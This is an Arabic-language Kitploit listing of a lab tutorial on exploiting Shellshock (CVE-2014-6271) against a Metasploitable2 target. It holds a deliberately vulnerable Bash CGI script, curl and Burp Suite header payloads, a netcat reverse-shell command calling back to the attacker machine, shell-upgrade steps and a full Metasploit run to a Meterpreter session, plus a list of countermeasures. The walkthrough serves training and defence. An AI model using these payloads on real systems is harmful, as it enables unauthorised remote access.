Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
تحليل الثغرات الأمنيةالاستغلالالهندسة العكسيةاستغلال تطبيقات الويبCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
تطوير الحمولات
مختبرات وتدريب عملي
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

مختبر عرض توضيحي حديث ومتكامل لثغرة CVE-2014-6271 (Shellshock)، ويتضمن البنية المعمارية، خطوات الاستغلال، استخدام Burp Suite، الصدى العكسي (Reverse Shells)، الإجراءات المضادة، وورقة غش كاملة بالأوامر.

عرض المستودع
4منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة Shellshock (CVE-2014-6271): مختبر عرض توضيحي حديث ومتكامل

تُعد Shellshock (CVE-2014-6271) واحدة من أكثر ثغرات تنفيذ الأكواد عن بُعد تأثيرًا على الإطلاق. تؤثر الثغرة على Bash وتسمح للمهاجمين بتنفيذ أوامر عشوائية بمجرد حقن حمولات مصممة بعناية في متغيرات البيئة.

يوفر هذا الدليل عرضًا كاملاً وقابلاً لإعادة الإنتاج باستخدام:

  • Kali Linux (المهاجم)
  • Metasploitable2 (الهدف)
  • curl وBurp Suite وNetcat
  • سكربت CGI مكتوب يدويًا بلغة Bash

صُمم هذا الدليل لأغراض التعليم والبحث والتدريب والتوعية العامة بالأمن السيبراني.


📌 جدول المحتويات

  1. بنية المختبر
  2. إنشاء سكربت CGI الضعيف
  3. فهم ثغرة Shellshock
  4. استغلال Shellshock باستخدام curl
  5. استغلال Shellshock باستخدام Burp Suite
  6. شل عكسي عبر Shellshock
  7. الترقية إلى TTY تفاعلي بالكامل
  8. مخطط سلسلة الهجوم
  9. معرض لقطات الشاشة
  10. التدابير المضادة
  11. مرجع سريع (جميع الأوامر)
  12. استغلال Shellshock باستخدام Metasploit
  13. الخلاصة

1. بنية المختبر

المكوّنالدورنظام التشغيلعنوان IPالخدمات الرئيسية
Kali LinuxالمهاجمKali Linux (الأحدث)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2الخادم الهدف الضعيفUbuntu Linux (MSF2)192.168.1.5Apache 2.2, نصوص CGI, Bash
Apache mod_cgiتنفيذ السكربتاتيعمل على MSF2n/aيكشف Bash عبر CGI
shellshock.shنقطة دخول ضعيفةBash CGIn/aيعرض متغيرات البيئة

يحاكي هذا الإعداد البسيط المكوّن من عقدتين العديد من البيئات القديمة التي لا تزال قائمة في الأنظمة الصناعية وأنظمة إنترنت الأشياء (IoT).


2. إنشاء سكربت CGI الضعيف

على Metasploitable2:

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

اختبر السكربت من Kali:

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

يجب أن ترى متغيرات البيئة معروضة.


3. فهم ثغرة Shellshock

تحدث ثغرة Shellshock عندما تقوم Bash بتحليل متغيرات البيئة التي تشبه تعريفات الدوال بشكل غير صحيح.

متغير خبيث مثل:

root@kitploit:~
() { :; }; /bin/bash -c "id"

سيجعل Bash تنفّذ الأمر بعد تعريف الدالة — حتى وإن لم يتم استدعاء الدالة نفسها أبدًا.

تكون تطبيقات CGI معرّضة للخطر بشكل خاص لأن ترويسات HTTP تُمرَّر تلقائيًا إلى السكربتات كمتغيرات بيئة.


4. استغلال Shellshock باستخدام curl

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

يجب أن يتضمن المخرَج:

root@kitploit:~
Vulnerable
uid=33(www-data)

هذا يؤكد تنفيذ الأكواد عن بُعد.


5. استغلال Shellshock باستخدام Burp Suite

5.1 إرسال طلب عادي

قم بزيارة:

root@kitploit:~
http://192.168.1.5/cgi-bin/shellshock.sh

أرسل الطلب إلى Repeater.

5.2 حقن حمولة Shellshock

استبدل ترويسة User-Agent بالتالي:

root@kitploit:~
User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 الاستجابة

يجب أن ترى:

root@kitploit:~
BurpTest
uid=33(www-data)

تؤكد Burp Suite الثغرة بطريقة مرئية وتعليمية.


6. شل عكسي عبر Shellshock

شغّل المستمع على Kali:

root@kitploit:~
nc -lvnp 4444

قم بتشغيل الشل العكسي عبر سكربت CGI:

root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

سيتصل الشل مرة أخرى بـ Kali.


7. الترقية إلى TTY تفاعلي بالكامل

داخل الشل العكسي:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

علّق الجلسة:

root@kitploit:~
Ctrl + Z

على Kali:

root@kitploit:~
stty raw -echo; fg

اضغط Enter.

أصبح لديك الآن:

  • إكمال التبويب
  • مفاتيح الأسهم
  • التحكم في الوظائف
  • Bash تفاعلي كامل

8. مخطط سلسلة الهجوم

root@kitploit:~
          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. معرض لقطات الشاشة

جولة مرئية عبر المراحل الرئيسية للهجوم.

الوصفالصورة
ناتج فحص Nmap + اختبار Shellshock
Burp Suite – طلب Shellshock الأولي
Burp Suite – حقن الحمولة / الترويسة
استلام الشل العكسي على Kali (nc)

10. التدابير المضادة

✔ 1. ترقية Bash

حدّث إلى إصدار يعالج تحليل الدوال بشكل صحيح.

✔ 2. تعطيل CGI

يُدخل CGI القديم مخاطر نظامية غير ضرورية.

✔ 3. تعقيم ترويسات HTTP

احذف الأنماط المشبوهة مثل:

root@kitploit:~
() { :; };

✔ 4. استخدام الامتياز الأقل

قيّد صلاحيات مستخدم خادم الويب (www-data).

✔ 5. تقييد الاتصالات الصادرة

يمنع الشلات العكسية وسرقة البيانات.

✔ 6. نشر جدار حماية لتطبيقات الويب (WAF)

تكتشف توقيعات WAF الحديثة Shellshock فورًا.

✔ 7. تفعيل SELinux / AppArmor

يحتوي عمليات Bash ويمنع السلوك غير المقصود.

✔ 8. إجراء فحوصات ثغرات منتظمة

استخدم أدوات مثل:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE (http-shellshock.nse)

11. مرجع سريع (جميع الأوامر)

إعداد الهدف

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

اختبار CGI

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

اختبار Shellshock

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

الشل العكسي

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

الترقية إلى TTY كامل

داخل الشل:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

علّق:

root@kitploit:~
Ctrl + Z

على Kali:

root@kitploit:~
stty raw -echo; fg

اضغط Enter.


12. استغلال Shellshock باستخدام Metasploit (msfconsole)

توفر Metasploit طريقة احترافية وآلية لاستغلال Shellshock باستخدام الوحدة المدمجة:

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec

هذه الطريقة سريعة وموثوقة وتوفر مراحل تحميل تلقائية للحمولة (مثل Meterpreter).


12.1 تشغيل Metasploit

root@kitploit:~
msfconsole

12.2 البحث عن وحدات Shellshock

root@kitploit:~
search shellshock

يجب أن ترى (من بين أمور أخرى):

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
auxiliary/scanner/http/apache_mod_cgi_bash_env   Apache mod_cgi Bash Environment Variable Injection (Scanner)

12.3 تحميل وحدة الاستغلال

root@kitploit:~
use exploit/multi/http/apache_mod_cgi_bash_env_exec

12.4 تكوين الخيارات المطلوبة

حدد عنوان IP للهدف:

root@kitploit:~
set rhosts 192.168.1.5

حدد مسار CGI الضعيف:

root@kitploit:~
set targeturi /cgi-bin/shellshock.sh

حدد عنوان IP الخاص بـ Kali:

root@kitploit:~
set lhost 192.168.1.4

اختياريًا، حدد منفذ الاستماع:

root@kitploit:~
set lport 4444

تحقق:

root@kitploit:~
options

يجب أن ترى:

root@kitploit:~
RHOSTS     192.168.1.5
TARGETURI  /cgi-bin/shellshock.sh
LHOST      192.168.1.4
LPORT      4444
METHOD     GET
HEADER     User-Agent
CVE        CVE-2014-6271

12.5 تشغيل الاستغلال

root@kitploit:~
run

عند النجاح:

root@kitploit:~
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Command Stager progress - 100.00%
[*] Sending stage ...
[*] Meterpreter session 1 opened ...

12.6 التفاعل مع جلسة Meterpreter

root@kitploit:~
sessions -i 1

أصبح لديك الآن:

root@kitploit:~
meterpreter >

12.7 إنشاء شل عادي

root@kitploit:~
shell

ثم:

root@kitploit:~
id
hostname

المتوقع:

root@kitploit:~
uid=33(www-data) gid=33(www-data)
metasploitable

لقد حصلت على تنفيذ أوامر عن بُعد باستخدام Metasploit وShellshock.


13. الخلاصة

يوضح هذا العرض التوضيحي كيف يمكن استغلال Shellshock من خلال التلاعب البسيط بترويسات HTTP، والشلات العكسية، وتنفيذ سكربتات CGI، وأتمتة Metasploit. وعلى الرغم من أن عمر الثغرة يتجاوز عقدًا من الزمن، تظل Shellshock درسًا مهمًا في:

  • ممارسات تطوير البرمجيات الآمنة
  • تعقيم المدخلات
  • مخاطر الأنظمة القديمة
  • تقنيات ما بعد الاستغلال

صُنع بكل حب بواسطة:
Haitham of Oman ❤️🇴🇲

تنزيل الأداة